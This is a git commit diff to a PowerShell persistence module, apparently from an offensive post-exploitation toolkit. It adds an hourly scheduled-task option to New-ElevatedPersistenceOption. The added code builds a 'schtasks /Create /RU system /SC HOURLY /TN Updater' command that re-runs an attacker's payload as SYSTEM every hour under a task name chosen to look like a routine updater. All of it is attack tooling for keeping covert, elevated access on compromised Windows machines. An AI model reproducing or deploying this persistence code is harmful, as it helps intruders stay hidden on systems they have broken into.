Added ScheduledTaskHourly to New-ElevatedPersistenceOption

2016-04-16 15:44:05 +03:00 · 2016-04-16 15:44:05 +03:00 · a6564f4483
parent 2a813faedb
commit a6564f4483
1 changed files with 20 additions and 0 deletions
--- a/Persistence/Persistence.psm1
+++ b/Persistence/Persistence.psm1
@ -55,6 +55,10 @@ function New-ElevatedPersistenceOption

    Starts the payload daily.

+.PARAMETER Hourly
+
+    Starts the payload hourly.
+
 .PARAMETER At

    Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'.
@ -83,6 +87,7 @@ function New-ElevatedPersistenceOption
        $PermanentWMI,

        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
+        [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]
        [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
        [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )]
        [Switch]
@ -97,6 +102,10 @@ function New-ElevatedPersistenceOption
        [Switch]
        $Daily,

+        [Parameter( ParameterSetName = 'ScheduledTaskHourly', Mandatory = $True )]
+        [Switch]
+        $Hourly,
+
        [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )]
        [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )]
        [DateTime]
@ -156,6 +165,12 @@ function New-ElevatedPersistenceOption
            $PersistenceOptionsTable['Time'] = $At
        }

+        'ScheduledTaskHourly'
+        {
+            $PersistenceOptionsTable['Method'] = 'ScheduledTask'
+            $PersistenceOptionsTable['Trigger'] = 'Hourly'
+        }
+
        'Registry'
        {
            $PersistenceOptionsTable['Method'] = 'Registry'
@ -574,6 +589,11 @@ Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription | Where-Obj
                    $ElevatedTrigger = "schtasks /Create /RU system /SC DAILY /ST $($ElevatedPersistenceOption.Time.ToString('HH:mm:ss')) /TN Updater /TR "
                }

+                'Hourly'
+                {
+                    $ElevatedTrigger = "schtasks /Create /RU system /SC HOURLY /TN Updater /TR "
+                }
+
                'OnIdle'
                {
                    $ElevatedTrigger = "schtasks /Create /RU system /SC ONIDLE /I 1 /TN Updater /TR "